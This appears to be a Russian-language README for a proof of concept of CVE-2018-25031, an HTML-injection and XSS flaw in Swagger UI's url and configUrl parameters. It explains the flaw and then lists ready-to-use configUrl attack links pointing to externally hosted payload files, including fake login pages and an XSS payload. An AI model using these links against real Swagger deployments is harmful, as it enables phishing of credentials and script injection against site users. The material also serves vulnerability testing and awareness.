
Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].
Swagger UI — это широко используемая библиотека, которая преобразует спецификации OpenAPI (ранее Swagger) в интерактивный веб-интерфейс. Она позволяет разработчикам и интеграторам исследовать и тестировать API без наличия бэкенд-реализации.
Уязвимость возникает из-за недостаточной проверки параметров URL-запроса, используемых для загрузки удаленных конфигурационных файлов или спецификаций клиентом Swagger UI. Обычно используются следующие параметры:
?url=.yaml?configUrl=.jsonЗлоумышленник может указать эти параметры на подконтрольный ему файл спецификации или конфигурации OpenAPI, размещенный удаленно, который может быть отрендерен уязвимым экземпляром.
Загрузка вредоносного удаленного файла может привести к нескольким серьезным последствиям в зависимости от конфигурации хостинга и используемых средств защиты:
Ссылки:
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json
Содержимое этого репозитория предоставлено только в образовательных и информационных целях. Автор не несет ответственности за любое неправомерное использование. Убедитесь, что у вас есть соответствующие разрешения перед использованием, действуйте ответственно на свой страх и риск, а также соблюдайте все юридические и этические нормы.